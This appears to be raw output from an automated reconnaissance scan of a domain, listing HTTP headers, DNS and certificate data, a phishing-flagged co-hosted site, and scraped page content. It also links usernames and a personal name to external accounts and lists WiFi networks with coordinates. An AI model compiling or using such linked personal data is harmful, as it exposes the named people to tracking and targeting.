| 2023-05-12 02:54:00 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5ccedd4dfe2bc6-FRA"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 104.21.6.166 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.247): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNetCBD2 (Net ID: 00:01:36:59:CB:D0) | 37.780462,-122.390564 |
| 2023-05-12 03:21:08 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Picsart (Category: art)
https://picsart.com/u/dawidsulej | dawidsulej |
| 2023-05-12 02:56:27 | Hash | No | Hash Extractor | 0 | 0 | 3 | 0 | None | [MD5] 02ca825e4901e74c2c2d6f8e59341325 | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="iron" href="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" sizes="512x512" type="image/png" />
<meta property="og:title" content="SkyHelper API - Documentation" />
<meta property="og:image" content="https://cdn.discordapp.com/avatars/710143953533403226/02ca825e4901e74c2c2d6f8e59341325.png?size=512" />
<meta property="oh.theme-color" content="#3585d0" />
<meta property="og:description" content="A hypixel skyblock API wrapper containing most features that the SkyHelper bot has to offer." />
<title>SkyHelper API - Documentation</title>
<link rel="stylesheet" href="https://stackedit.io/style.css" />
</head>
<body class="stackedit">
<div class="stackedit__html">
<h1 id="skyhelper-api">SkyHelper API</h1>
<h1 id="authentication">Authentication</h1>
<p>
The SkyHelper API uses their own API keys to authenticate requests. You can either host this API on your own server and define keys on there or subscribe to the SkyHelper
<a href="https://www.patreon.com/skyhelper">Patreon</a> (Silver or Gold Supporter) to get an API key from me.<br />
You can either use the key query parameter by adding a
<code>?key=token</code> to the end of API requests or using an authorization header by adding a <code>Authorization</code> header to your API requests, where the value of the header is your API
token.
</p>
<h1 id="responses">Responses</h1>
<p>
All endpoints in the API return all their responses in JSON, all requests will return a <code>status</code> key which should match the response status code that was returned and a
<code>data</code> key for successful responses. A <code>reason</code> key will be returned for failed requests.
</p>
<table>
<thead>
<tr>
<th>Status Code</th>
<th>Reason</th>
</tr>
</thead>
<tbody>
<tr>
<td>200</td>
<td>Successful request</td>
</tr>
<tr>
<td>400</td>
<td>
The request is missing an authentication method (valid
<code>key</code> query parameter or an <code>Authentication</code> header)
</td>
</tr>
<tr>
<td>403</td>
<td>The provided token does not exist</td>
</tr>
<tr>
<td>404</td>
<td>There is no player with the given UUID or name or the player has no SkyBlock profiles</td>
</tr>
<tr>
<td>429</td>
<td>
The Hypixel API rate-limit was reached (The API will return
<code>RateLimit-Remaining</code> and <code>RateLimit-Reset</code> headers)
</td>
</tr>
<tr>
<td>500</td>
<td>
There was an error in the SkyHelper API or the Hypixel API returned an unknown error code. Please report these errors back on
<a href="https://github.com/Altpapier/SkyHelperAPI/issues">GitHub</a>
</td>
</tr>
<tr>
<td>502</td>
<td>Hypixels API is experiencing some technical issues or is unavailable</td>
</tr>
<tr>
<td>503</td>
<td>Hypixels API is in maintenance mode</td>
</tr>
<tr>
<td>504</td>
<td>Hypixels API returned a <code>Gateway Time-out</code> error</td>
</tr>
</tbody>
</table>
<h1 id="endpoints">Endpoints</h1>
<h3 id="get-v2networth"><code>POST</code> /v2/networth</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>profileData</td>
<td>Object</td>
<td>The profile player data from the Hypixel API (profile.members[uuid])</td>
</tr>
<tr>
<td>bankBalance</td>
<td>Number</td>
<td>The player's bank balance from the Hypixel API (profile.banking?.balance)</td>
</tr>
<tr>
<td>onlyNetworth</td>
<td>Boolean</td>
<td>(default: false) If true, only the networth will be returned</td>
</tr>
</tbody>
</table>
<h3 id="post-v2networthitem"><code>POST</code>/v2/networth/item</h3>
<table>
<thead>
<tr>
<th>Field</th>
<th>Type</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>itemData</td>
<td>Object</td>
<td>The parsed item data of an item from the profiles endpoint</td>
</tr>
</tbody>
</table>
<h3 id="get-v2profilesuser"><code>GET</code> /v2/profiles/:user</h3>
<h3 id="get-v2profileuserprofile"><code>GET</code> /v2/profile/:user/:profile</h3>
<h3 id="get-v1profilesuser"><code>GET</code> /v1/profiles/:user</h3>
<h3 id="get-v1profileuserprofile"><code>GET</code> /v1/profile/:user/:profile</h3>
<h3 id="get-v1profilesuseritems"><code>GET</code> /v1/items/:user</h3>
<h3 id="get-v1profileuserprofileitems"><code>GET</code> /v1/items/:user/:profile</h3>
<h3 id="get-v1fetchur"><code>GET</code> /v1/fetchur</h3>
<table>
<thead>
<tr>
<th>Parameter</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>user</td>
<td>This can be the UUID of a user or the name</td>
</tr>
<tr>
<td>profile</td>
<td>This can be the users profile id or name</td>
</tr>
</tbody>
</table>
<h1 id="networthcalculationtypes">Networth Calculation Types</h1>
<p>Types that are used to describe an item's calculation</p>
<table>
<thead>
<tr>
<th>Type</th>
</tr>
</thead>
<tbody>
<tr>
<td>essence</td>
</tr>
<tr>
<td>prestige</td>
</tr>
<tr>
<td>shens_auction</td>
</tr>
<tr>
<td>winning_bid</td>
</tr>
<tr>
<td>enchant</td>
</tr>
<tr>
<td>silex</td>
</tr>
<tr>
<td>wood_singularity</td>
</tr>
<tr>
<td>tuned_transmission</td>
</tr>
<tr>
<td>thunder_charge</td>
</tr>
<tr>
<td>rune</td>
</tr>
<tr>
<td>fuming_potato_book</td>
</tr>
<tr>
<td>hot_potato_book</td>
</tr>
<tr>
<td>dye</td>
</tr>
<tr>
<td>the_art_of_war</td>
</tr>
<tr>
<td>the_art_of_peace</td>
</tr>
<tr>
<td>farming_for_dummies</td>
</tr>
<tr>
<td>recombobulator_3000</td>
</tr>
<tr>
<td>gemstone</td>
</tr>
<tr>
<td>reforge</td>
</tr>
<tr>
<td>master_star</td>
</tr>
<tr>
<td>necron_scroll</td>
</tr>
<tr>
<td>gemstone_chamber</td>
</tr>
<tr>
<td>drill_part</td>
</tr>
<tr>
<td>etherwarp_conduit</td>
</tr>
<tr>
<td>pet_item</td>
</tr>
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:F6:2B:B0) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:53:35 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: 22DC:47A8:9574C0:E80210:645D792E
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100109-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683847470.229374,VS0,VE28
Vary: Accept-Encoding
X-Fastly-Request-ID: ae50aba31a182a84ec5561a841cace6a8bdb972f
| 185.199.110.153 |
| 2023-05-12 02:55:15 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60306, Germany, Europe | 165.232.113.85 |
| 2023-05-12 02:54:13 | HTTP Headers | No | Web Spider | 2 | 0 | 3 | 0 | None | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:13 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-19c8\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:13 GMT", "cf-ray": "7c5f6036af1541db-EWR", "content-type": "text/css", "x-frame-options": "DENY"} | https://ayhu.xyz/cdn-cgi/styles/challenges.css |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Interwrx2 (Net ID: 00:02:2D:A8:80:99) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:23:41 | Account on External Site | No | Account Finder | 0 | 0 | 8 | 0 | None | PinkBike (Category: hobby)
https://www.pinkbike.com/u/baptiste.vauthey/ | baptiste.vauthey |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 50d173 (Net ID: 00:02:2D:50:D1:73) | 37.7642, -122.3993 |
| 2023-05-12 03:09:52 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.95 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 0 | 4 | 0 | None | cloudflare | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:21 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f606679610ce9-EWR"} |
| 2023-05-12 03:34:24 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 45.131.109.47 | 45.131.109.53 |
| 2023-05-12 03:16:25 | Username | No | Account Finder | 1 | 0 | 1 | 0 | None | dawid.sulej | Dawid Sulej |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-experiments.github.io]
https://www.openphish.com/feed.txt | 0-experiments.github.io |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ^D^M^L^W^]^C^A^U^M^Y^E^L^_^R^G (Net ID: 00:05:5D:D9:90:56) | 33.6170672,-111.90564645297056 |
| 2023-05-12 02:54:23 | Raw Data from RIRs | No | Censys | 0 | 0 | 4 | 0 | None | {"last_updated_at": "2023-05-11T18:43:25.661Z", "ip": "2600:1f18:2489:8201::c8", "location_updated_at": "2023-05-10T22:49:08.075439Z", "autonomous_system_updated_at": "2023-05-10T22:49:08.075529Z", "location": {"province": "Washington", "city": "Seattle", "country": "United States", "coordinates": {"latitude": 47.5413, "longitude": -122.3129}, "postal_code": "98108", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"admirable-sawine-258e70.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-20T18:07:13.274900003Z"}, "elegant-lamarr-f016a5.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-26T12:07:06.626972022Z"}, "awesome-saha-1063e8.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-13T20:12:33.221704149Z"}, "sinfitobahia.org.br": {"record_type": "AAAA", "resolved_at": "2023-05-03T12:41:58.372964765Z"}, "docs.avohq.io": {"record_type": "CNAME", "resolved_at": "2023-03-28T16:11:01.233563954Z"}, "125summer.tech": {"record_type": "AAAA", "resolved_at": "2023-04-08T21:50:10.818543379Z"}, "elastic-panini-108062.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-12T12:07:25.879261834Z"}, "au.podandparcel.com": {"record_type": "CNAME", "resolved_at": "2023-03-30T16:00:18.714848447Z"}, "vocal-zuccutto-9a1234.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-16T12:05:56.238760539Z"}, "elektra-preview.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-21T12:07:46.259642345Z"}, "a244ca4d-f02d-4158-9d95-f3ecc3f53891.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-02T12:06:48.489568142Z"}, "panel-v2.temettu.app": {"record_type": "CNAME", "resolved_at": "2023-03-09T20:24:59.058260947Z"}, "prod.multiomictrials.org": {"record_type": "CNAME", "resolved_at": "2023-05-11T07:03:53.434490891Z"}, "www.carobee.com": {"record_type": "CNAME", "resolved_at": "2023-03-29T23:13:35.058671591Z"}, "imaginative-douhua-e8b30d.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-08T12:07:16.963335570Z"}, "amazing-rosalind-d7b3f6.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-15T21:01:17.245078119Z"}, "adoring-saha-207b27.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-19T12:07:14.290654779Z"}, "admiring-shockley-79970e.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-09T20:24:36.502830220Z"}, "melodious-choux-89c61f.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-21T12:07:33.880974154Z"}, "www.nho.agency": {"record_type": "CNAME", "resolved_at": "2023-05-09T12:14:42.515710945Z"}, "buyer-bear-80751.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-28T12:07:56.868671510Z"}, "adminapp-stg-bb.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-19T12:06:26.217035493Z"}, "kleffylewave.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-16T12:07:29.763936588Z"}, "www.fusion360-lessen.nl": {"record_type": "CNAME", "resolved_at": "2023-05-05T06:06:11.637299697Z"}, "pensioenbijmivena.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-20T12:06:16.135802084Z"}, "ww2.globhe.com": {"record_type": "CNAME", "resolved_at": "2022-12-22T22:30:15.315472377Z"}, "fo-fcmpartner.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-15T12:14:19.621357517Z"}, "galatea.investments": {"record_type": "AAAA", "resolved_at": "2023-03-10T15:30:44.210263044Z"}, "mellow-fox-b03dde.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-16T12:05:46.679121554Z"}, "www.circuitsolvr.com": {"record_type": "CNAME", "resolved_at": "2023-05-02T14:40:14.102090269Z"}, "superlative-lollipop-7e1b2d.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-21T12:07:26.859419Z"}, "adoring-liskov-894667.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-20T18:05:54.034044971Z"}, "adoring-ritchie-740a79.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-19T12:06:21.555197218Z"}, "chefsencasa.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-17T12:07:54.157101501Z"}, "afoodcorner.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-16T12:05:53.904909902Z"}, "drxmas-drugrecipts.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-01T12:08:22.715647640Z"}, "brave-darwin-3ec1aa.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-01-12T12:06:04.788840263Z"}, "atap-website.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-07T12:06:17.618834777Z"}, "donnasite.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-18T12:07:50.141206743Z"}, "fervent-panini-403ce8.netlify.app": {"record_type": "AAAA", "resolved_at": "2022-12-23T12:04:50.255084747Z"}, "onda-dashboard.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-11T12:07:55.080623384Z"}, "lgs.blixem.app": {"record_type": "CNAME", "resolved_at": "2023-03-22T15:33:56.182939800Z"}, "khi-pcr.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-10T12:06:17.044575435Z"}, "begindrop.renovate.eu.org": {"record_type": "CNAME", "resolved_at": "2023-02-22T20:42:47.682094308Z"}, "ctrrun.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-09T12:06:37.296522475Z"}, "taffeur.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-19T21:37:57.720116083Z"}, "blankk.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-19T12:06:19.086245128Z"}, "musing-pasteur-944869.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-03T12:09:53.217150668Z"}, "aday.taleon.com.tr": {"record_type": "CNAME", "resolved_at": "2023-03-19T18:28:30.895427718Z"}, "awesome-bell-28a875.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-20T18:08:11.875214119Z"}, "dcchigh.asd20.org": {"record_type": "CNAME", "resolved_at": "2023-03-22T20:36:34.105722416Z"}, "www.madeinjanne.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T15:48:29.495707139Z"}, "adairo.com": {"record_type": "AAAA", "resolved_at": "2023-04-25T13:20:23.956589050Z"}, "maps.worlddata.ai": {"record_type": "CNAME", "resolved_at": "2023-04-26T12:14:41.745808129Z"}, "agitated-cori-358df7.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-01-25T12:06:03.181307858Z"}, "blissful-franklin-4bf4f9.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-22T12:08:06.409034750Z"}, "www.frentelibertad.com": {"record_type": "CNAME", "resolved_at": "2023-03-20T21:11:53.928072067Z"}, "mosquesg.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-13T12:08:14.395524985Z"}, "pod-flat.syndicut.io": {"record_type": "CNAME", "resolved_at": "2023-03-14T00:30:35.395497004Z"}, "ctrlup-signature.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-06T12:08:04.751075336Z"}, "ones.studio": {"record_type": "AAAA", "resolved_at": "2023-02-27T19:14:46.168703619Z"}, "www.mymedpal.app": {"record_type": "CNAME", "resolved_at": "2023-03-11T12:07:45.700611299Z"}, "aesthetic-babka-1b6f1e.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-18T12:07:41.897884021Z"}, "first-eet-kit.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-14T12:06:11.898889272Z"}, "moonlit-pixie-20706b.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-03T12:09:47.218930369Z"}, "druckzauber-erfolgreich-drucken-de.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-15T12:14:15.500256290Z"}, "finsteadrs.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-08T12:07:22.127243814Z"}, "minschkopattern.blumfelix.com": {"record_type": "CNAME", "resolved_at": "2023-05-02T05:42:07.653366604Z"}, "admirable-stardust-6a2b73.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-18T12:07:39.597845749Z"}, "drna.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-08T12:07:24.236571686Z"}, "clever-davinci-4e13a8.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-15T21:00:56.725412657Z"}, "afli.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-20T12:06:10.280894910Z"}, "cerulean-arithmetic-d6e551.netlify.app": {"record_type": "AAAA", "resolved_at": "2022-12-23T12:04:50.256222789Z"}, "program.modernbikinibootcamp.de": {"record_type": "CNAME", "resolved_at": "2023-03-20T15:01:26.680678928Z"}, "myaccountdemo.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-19T12:06:28.838541216Z"}, "aaronmbdev-website.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-15T12:07:03.899811400Z"}, "a11y-amadeo.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-28T12:07:43.347226879Z"}, "admin-toc-prod.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-14T12:07:10.285250452Z"}, "base64-converter.amitk.co.in": {"record_type": "CNAME", "resolved_at": "2023-03-04T16:29:10.338273182Z"}, "data.goodgovgroup.com": {"record_type": "CNAME", "resolved_at": "2023-03-25T03:20:40.904161459Z"}, "centurionplaza.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-15T21:01:18.561284349Z"}, "dufflapp.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-08T12:07:27.177014422Z"}, "www.gardentogoorganics.com": {"record_type": "CNAME", "resolved_at": "2023-03-11T13:58:42.361808644Z"}, "adamcassidy.com": {"record_type": "AAAA", "resolved_at": "2023-04-25T13:20:29.677591257Z"}, "adoring-kilby-3a4082.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-18T19:28:26.626696081Z"}, "dominiquejobin-com-static-page.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-22T15:33:21.084197417Z"}, "next.boxup.com": {"record_type": "CNAME", "resolved_at": "2023-02-21T13:53:15.908090617Z"}, "adoring-ptolemy-0a1d82.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-22T10:04:04.309883028Z"}, "buildandtone.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-16T00:14:06.184711680Z"}, "keen-yonath-a2a70b.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-01T12:05:54.489788454Z"}, "awesome-jones-c007a7.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-02-16T12:07:32.736095932Z"}, "musing-raman-2ebc3f.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-19T21:38:23.373994703Z"}, "nok-ventures.netlify.app": {"record_type": "AAAA", "resolved_at": "2023-03-02T12:06:37.102772823Z"}, "cenos-docs-antennas.netlify.app": {"record_type": "AAAA", "resolved_at": "2 | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:33:53 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | !22222222222222222222222222222222222222222222222222
sH GN
t5ad
C'Y2z
OB:`S
pF>oj
OQTeuy
YYK`s
gnqV
N9FX6
EQY66
1pO'94
pj'R7pz`
0Kdes
xnj $
Zx<g?
X2r:z
T/z`A
G'?QN
$RpG9
Vdrnr1
mP0>Lc
1RNG\T
Uwp9'
YYWvz
Ru?wnz
a$$cp
m?/_J
kFpFv
2OAMYI
``VZH
.NGAM
yG`<c
lr@?L
h`NFx
@JgR
I?w<f
E BY8
<7LqQH
jLbFC0
.jG30
<.Y@O
sY_kV$
`-vSX
OOjLp
1D!@
ww P'
vOpjN
0?.qOY
1UONy
8nGqXW0
cQ2-c
5RG8 H
Gb:UW
HIRA
?q'fq
7aG'x
R`k xPW
HC$vf
P2W$g
FNGP3
:TerT
:sP1U
qhoSo
'wwEU
o_ZiP
nbO\qS
.Ojvv
EUbNTrI
5mPdRF
Df9`q
JVfrI
r0r3SF
j0AbHa
oBwg>
COv!FO9
XM.Iz
I@V98
1QH@bG'8
.A`A<
i2wpIa
5 b V
.0G5NR1
H`ePs
!?36H
j9c!A
t4.Vel
U\D!I
H09'q
Nj\JL
fE''p
Ilg4
<dRIa"
pFH'q'
i9'9?
uO_Z\
XiH`G
$pqJwd
n5px$
6GzyU | https://funny.battleb0t.xyz/images/random_2.jpeg |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BJNPSETUP (Net ID: 00:00:85:F4:A4:02) | 41.8781, -87.6298 |
| 2023-05-12 02:54:57 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 2a06:98c1:3120::1 |
| 2023-05-12 02:55:21 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:81:34:2e:fd:61:48:b5:6f:11:ca:36:0b:dc:62:9a:cf:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=vscode.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:eb:b0:96:39:35:d3:30:8a:f5:f9:da:c5:cf:96:
1a:e7:f9:f3:a9:a3:ac:48:a3:a4:b9:37:4c:63:75:
40:36:2d:7f:85:6e:28:b7:ff:1d:a9:b7:7a:9e:a9:
3c:18:2e:aa:60:9b:01:a6:03:71:f5:37:c6:c4:08:
7f:2e:0c:29:9a:02:88:31:a0:12:65:5e:31:21:f1:
5f:d6:97:6e:ea:18:9d:90:ce:ff:12:3b:cb:ae:3a:
f3:b3:33:e6:51:66:ee:77:b1:1e:2d:63:9d:86:29:
e8:e7:da:f5:95:bf:4c:37:58:2b:4b:3b:b3:82:8c:
63:1f:3a:3d:4d:85:c4:0d:2f:dd:0c:39:76:ab:a5:
7c:fc:53:9d:e0:67:9e:f7:6e:00:5d:8f:60:c1:b4:
dd:6b:fb:d3:a5:23:a0:c0:99:85:04:91:d1:e3:63:
1f:33:3f:20:df:22:22:a9:89:b5:26:f8:3b:cf:ec:
a6:2f:0a:b5:ce:e9:fd:d6:cf:3c:d3:6e:35:3e:a2:
cb:0a:4c:43:1f:c2:91:d1:57:92:fc:79:bc:b6:50:
67:72:7f:f2:de:ba:e6:81:c8:81:ad:91:41:c2:41:
68:e4:66:e4:cf:77:e7:8f:ad:4a:dd:cf:21:57:7e:
5c:5b:1a:bf:18:03:99:5a:e7:0b:bf:13:4e:4f:9d:
f8:63:3c:53:43:ba:5c:2b:86:aa:b1:6c:59:33:66:
06:b4:0c:58:5e:eb:57:fb:21:90:64:8e:04:88:5e:
93:71:bc:07:a7:76:0a:39:5b:e9:8a:11:59:0c:e9:
3d:9f:ef:48:1a:15:f1:b6:8d:38:c6:ac:b0:3d:55:
62:fd:ec:ca:10:f7:3e:ad:09:2b:f9:07:39:64:89:
c0:8c:df:58:83:b1:49:a3:6a:de:8d:1d:b0:68:22:
42:05:11:89:f5:28:3d:e2:a8:01:12:cb:7f:55:12:
36:97:26:ba:dd:f2:81:bc:89:38:da:02:ae:fd:90:
99:5d:a3:f5:46:95:ac:11:67:63:06:d1:ab:ad:cc:
15:5b:ae:15:c5:be:e2:e1:4a:b9:58:65:89:ff:47:
b7:6c:bd:4d:78:de:bc:99:4b:30:66:94:63:8c:10:
f1:ba:46:36:e6:f8:37:e7:a4:4a:58:f8:29:e5:40:
29:33:93:f8:de:48:92:4e:5d:bb:50:eb:49:71:90:
ef:b5:9b:2c:bf:b0:19:fb:12:45:a7:b3:2e:45:b4:
1b:cf:46:ab:19:7f:6c:7d:d1:f9:c0:87:cb:fb:3f:
0d:76:c4:c2:98:11:bd:11:fc:93:89:ac:ab:3e:87:
64:67:c1:b8:49:1c:b8:1a:ca:85:02:c8:58:c0:9e:
e2:87:d7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A7:55:24:63:5E:86:20:7B:DE:F3:EF:D8:48:33:0B:C7:5C:3F:22:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
6e:81:de:04:94:c9:6d:bc:7e:82:9c:b7:57:2a:31:2b:2a:15:
1b:26:9d:e8:63:d8:bc:24:a9:a0:1e:f4:2d:8e:8b:77:72:e2:
45:09:7d:c4:f4:a1:67:74:5f:b1:6e:e3:d5:7b:46:58:74:af:
3c:f4:7f:f1:57:ba:e5:f5:ca:37:d7:63:02:f4:2b:f0:58:52:
65:e6:f9:34:c3:b2:87:a8:5a:9e:4d:cc:ad:de:a2:88:9a:d9:
fb:01:e4:7d:b5:a9:46:4f:bf:42:f8:a7:e0:7c:4b:26:0d:e1:
03:f1:4d:5f:48:bd:93:91:fe:01:c1:d3:33:76:7b:4d:7a:50:
63:0e:b1:b7:18:cd:30:ef:c6:05:90:d5:58:43:01:34:1c:aa:
ff:ac:8a:6d:d3:fb:4a:05:f7:40:bc:ca:04:f0:3d:5a:22:8b:
64:c2:7e:01:3e:5c:75:9a:28:80:e0:18:f5:4e:81:da:ad:98:
1b:02:b9:0a:2d:ec:15:e3:8e:9f:22:a4:7c:3a:69:7f:11:1b:
f6:07:40:ec:11:96:35:36:ea:3a:5b:21:5e:98:6b:a7:33:3f:
71:d6:80:da:db:36:8a:58:96:45:25:cb:40:f8:9f:e6:4f:1b:
19:eb:29:e3:55:cb:ac:82:21:95:75:58:e6:53:4c:36:8c:6c:
15:08:cf:81
| battleb0t.xyz |
